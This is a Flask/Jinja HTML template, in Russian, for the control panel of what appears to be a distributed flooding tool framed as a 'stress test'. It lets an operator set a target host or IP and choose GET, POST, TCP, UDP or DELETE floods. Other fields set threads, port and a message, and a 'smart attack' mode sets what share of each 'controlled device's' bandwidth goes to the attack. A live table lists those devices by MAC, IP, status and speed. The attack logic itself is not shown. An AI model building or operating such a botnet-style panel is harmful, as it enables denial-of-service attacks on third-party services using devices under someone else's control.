<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>NOC</title>
    <link href="{{ url_for('static', filename='css/bootstrap.css') }}"
          rel="stylesheet">
    <link href="{{ url_for('static', filename='css/style.css') }}"
          rel="stylesheet">
</head>
<body>
<div class="container mt-5">
    <div class="row">
        <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6">
            <fieldset class="border-green w-100 mb-01">
                <legend>1. Укажите адрес</legend>
                <form class="m-2 w-100">
                    <p>Хост
                        <input onchange="change_host_ip(this)" name="url"
                               class="ml-url" type="url">
                    </p>
                    <p>Айпи
                        <input type="ip" class="ml-1" minlength="7"
                               maxlength="15"
                               size="15"
                               name="ip"
                               onchange="change_host_ip(this)"
                               pattern="^((\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.){3}(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])$">
                    </p>
                    <center><input id="check" type="button" value="Проверить"
                                   onclick="check_available_host_ip(this)">
                    </center>
                </form>
            </fieldset>
        </div>
        <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3">
            <fieldset class="border-green w-100">
                <legend>2. Метод</legend>
                <form class="w-100">
                    <input type="radio" id="contactChoice1" name="method"
                           value="get" onchange="change_method()" checked/>
                    <label for="contactChoice1" class="mb-1">GET</label>
                    <br>

                    <input type="radio" id="contactChoice2" name="method"
                           value="post" onchange="change_method()"/>
                    <label for="contactChoice2" class="mb-1">POST</label>
                    <br>

                    <input type="radio" id="contactChoice3" name="method"
                           value="tcp" onchange="change_method()"/>
                    <label for="contactChoice3" class="mb-1">TCP</label>
                    <br>

                    <input type="radio" id="contactChoice4" name="method"
                           value="udp" onchange="change_method()"/>
                    <label for="contactChoice4" class="mb-1">UDP</label>
                    <br>

                    <input type="radio" id="contactChoice5" name="method"
                           value="delete" onchange="change_method()"/>
                    <label for="contactChoice5">DELETE</label>
                </form>
            </fieldset>
        </div>
        <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3">
            <fieldset class="border-green w-100">
                <legend>5. Начать</legend>
                {% if host %}
                    <form action="{{ url_for('stop') }}">
                        <center><input id="btn-start" class="m-2" type="submit"
                                       value="Стоп">
                        </center>
                    </form>
                {% else %}
                    <center><input id="btn-start" class="m-2" type="button"
                                   value="Старт" onclick="start()"></center>
                {% endif %}
            </fieldset>
        </div>
    </div>
    <div class="row mt-5">
        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12" id="base">
            <fieldset class="border-green w-100">
                <legend>3. Настройка теста</legend>
                <div class="row">
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <label>Задержка</label>
                        <br>
                        <input name="timeout_1" type="number" value="2000">
                    </div>
                    <div class="col-xs-4 col-sm-6 col-md-5 col-lg-4">
                        <label>TCP/UDP сообщение</label>
                        <br>
                        <input class="text-center" name="msg_tcp_udp1"
                               id="msg_tcp_udp1"
                               type="text" value="This is stress test">
                    </div>
                    <div class="col-xs-3 col-sm-3 col-md-2 col-lg-1">
                        <label>Порт</label>
                        <br>
                        <input max="65535" min="0" name="port1" type="number"
                               id="port"
                               value="80">
                    </div>
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <label>Максимум потоков</label>
                        <br>
                        <input max="65535" min="0" name="max_thread"
                               type="number"
                               value="250">
                    </div>
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <div style="margin-top: 13%;"
                             onclick="change_attack_type(1)">
                            <input type="checkbox" id="scales1"
                                   name="smart_attack"
                                   onclick="return false;"/>
                            <label for="scales1">Умная атака</label>
                        </div>
                    </div>
                </div>
            </fieldset>
        </div>
        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12" id="smart"
             style="display: none;">
            <fieldset class="border-green w-100">
                <legend>3. Настройка умной атаки</legend>
                <div class="row">
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <label>Задержка</label>
                        <br>
                        <input name="timeout_2" type="number" value="2000">
                    </div>
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <label title="Сколько трафика будет уходить на атаку у подконтрольного устройства">%
                            скорости</label>
                        <br>
                        <input onchange="change_percent(this)" name="percent"
                               type="number" value="25">
                    </div>
                    <div class="col-xs-4 col-sm-6 col-md-5 col-lg-4">
                        <label>TCP/UDP сообщение</label>
                        <br>
                        <input class="text-center" name="msg_tcp_udp2"
                               type="text" value="This is stress test">
                    </div>
                    <div class="col-xs-3 col-sm-3 col-md-2 col-lg-1">
                        <label>Порт</label>
                        <br>
                        <input max="65535" min="0" name="port2" type="number"
                               value="80">
                    </div>
                    <div class="col-xs-4 col-sm-4 col-md-3 col-lg-2">
                        <div style="margin-top: 13%;"
                             onclick="change_attack_type(2)">
                            <input type="checkbox" id="scales2"
                                   name="smart_attack" onclick="return false;"
                                   checked/>
                            <label for="scales2">Умная атака</label>
                        </div>
                    </div>
                </div>
            </fieldset>
        </div>
    </div>
    <div class="row mt-5">
        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
            <fieldset class="border-green w-100">
                <legend>4. Подконтрольные устройства</legend>
                <div class="row" id="table_users">
                    {% for user in users|reverse %}
                        <div class="col-xs-4 col-sm-4 col-md-4 col-lg-3">
                            <input class="border-0" type="text" id="scales"
                                   name="mac_address"
                                   value="{{ user.mac }}"
                                   disabled/>
                        </div>
                        <div class="col-xs-2 col-sm-3 col-md-4 col-lg-3">
                            <label>{{ user.ip }}</label>
                        </div>
                        <div class="col-xs-2 col-sm-2 col-md-3 col-lg-2">
                            {% if user.last_seen|float > last_seen_max %}
                                <label>В сети</label>
                            {% else %}
                                <label>Не в сети</label>
                            {% endif %}
                        </div>
                        <div class="col-xs-2 col-sm-2 col-md-2 col-lg-2 text-end">
                            {% set internet_speed = user.internet_speed | int %}
                            {% if internet_speed // 1048576 == 0 or user.last_seen|float < last_seen_max %}
                                <label>-</label>
                            {% else %}
                                <label>{{ internet_speed // 1048576 }}
                                    мб/с</label>
                            {% endif %}
                        </div>
                        <hr class="mt-2">
                    {% endfor %}
                </div>
            </fieldset>
        </div>
    </div>
</div>

<form class="d-none" method="post" id="send_form"
      action="{{ url_for('start') }}">
    <input type="hidden" name="host_">
    <input type="hidden" name="method_">
    <input type="hidden" name="smart_">
    <input type="hidden" name="timeout_">
    <input type="hidden" name="msg_tcp_udp_">
    <input type="hidden" name="port_">
    <input type="hidden" name="max_thread_">
    <input type="hidden" name="percent_">
    <input type="hidden" name="stop_">
    <input type="submit">
</form>

<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"
        integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3"
        crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.min.js"
        integrity="sha384-cuYeSxntonz0PPNlHhBs68uyIAVpIIOZZ5JqeqvYYIcEL727kskC66kF92t6Xl2V"
        crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
<script src="{{ url_for('static', filename='js/script.js') }}"></script>

{% if host %}
    <script>
        document.getElementById('btn-start').value = 'Стоп';

        let url = document.getElementsByName('url')[0];
        let ip = document.getElementsByName('ip')[0];
        let re = new RegExp(ip.pattern);
        if (re.test("{{ host }}")) {
            ip.value = "{{ host }}";
            url.disabled = true;
            url.placeholder = 'Не более 1 адреса';
        } else {
            url.value = "{{ host }}";
            ip.disabled = true;
            ip.placeholder = 'Не более 1 адреса';
        }

        let btns = document.getElementsByName('method');
        for (let i = 0; i < btns.length; i++) {
            if (btns[i].value.toLowerCase() === "{{ method }}") {
                btns[i].checked = true;
            }
        }

        let base = document.getElementById('base')

        {% if smart %}
            base.style = 'display: none';
            smart.style = 'display: block';

            document.getElementsByName('msg_tcp_udp2')[0].value = "{{ msg_tcp_udp }}";
            document.getElementsByName('port2')[0].value = "{{ port }}";
            document.getElementsByName('timeout_2')[0].value = "{{ timeout }}"
        {% else %}
            document.getElementsByName('msg_tcp_udp1')[0].value = "{{ msg_tcp_udp }}";
            document.getElementsByName('port1')[0].value = "{{ port }}";
            document.getElementsByName('timeout_1')[0].value = "{{ timeout }}"
        {% endif %}

        document.getElementsByName('max_thread')[0].value = "{{ max_thread }}";
        document.getElementsByName('percent')[0].value = "{{ percent }}";
        change_method()
    </script>
{% endif %}
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script type="text/javascript">
    function updateUserTable(x) {
        $.ajax({
            method: "POST",
            url: "{{ url_for('get_users') }}",
            dataType: 'json',
            success: function (msgBackFromServer) {
                data = JSON.stringify(msgBackFromServer)
                data = JSON.parse(data)['users']
                table_user = document.getElementById('table_users')
                console.log(table_user)
                while (table_user.firstChild) {
                    table_user.removeChild(table_user.lastChild);
                }

                console.log(data)

                container = document.getElementById('table_users')
                for (var key in data) {
                    user = data[key]
                    if (user['online']) {
                        online_status = 'В сети'
                    } else {
                        online_status = 'Не в сети'
                    }

                    internet_speed = Math.round(user['internet_speed'] / 1048576)
                    if (internet_speed < 1 || online_status === 'Не в сети') {
                        internet_speed_status = '-'
                    } else {
                        internet_speed_status = internet_speed + ' мб/с'
                    }

                    container.innerHTML += `
                        <div class="col-xs-4 col-sm-4 col-md-4 col-lg-3">
                            <input class="border-0" type="text" id="scales"
                                   name="mac_address"
                                   value="${user['mac']}"
                                   disabled/>
                        </div>
                        <div class="col-xs-2 col-sm-3 col-md-4 col-lg-3">
                            <label>${user['ip']}</label>
                        </div>
                        <div class="col-xs-2 col-sm-2 col-md-3 col-lg-2">
                            <label>${online_status}</label>
                        </div>
                        <div class="col-xs-2 col-sm-2 col-md-2 col-lg-2 text-end">
                                <label>${internet_speed_status}</label>
                        </div>
                        <hr class="mt-2">
                    `
                }
            },
            error: function (msgBackFromServer) {
                console.log('Ошибка обновление талицы пользователей...')
            }
        })
        setTimeout(updateUserTable, 5000);
    }

    updateUserTable()
</script>

</body>
</html>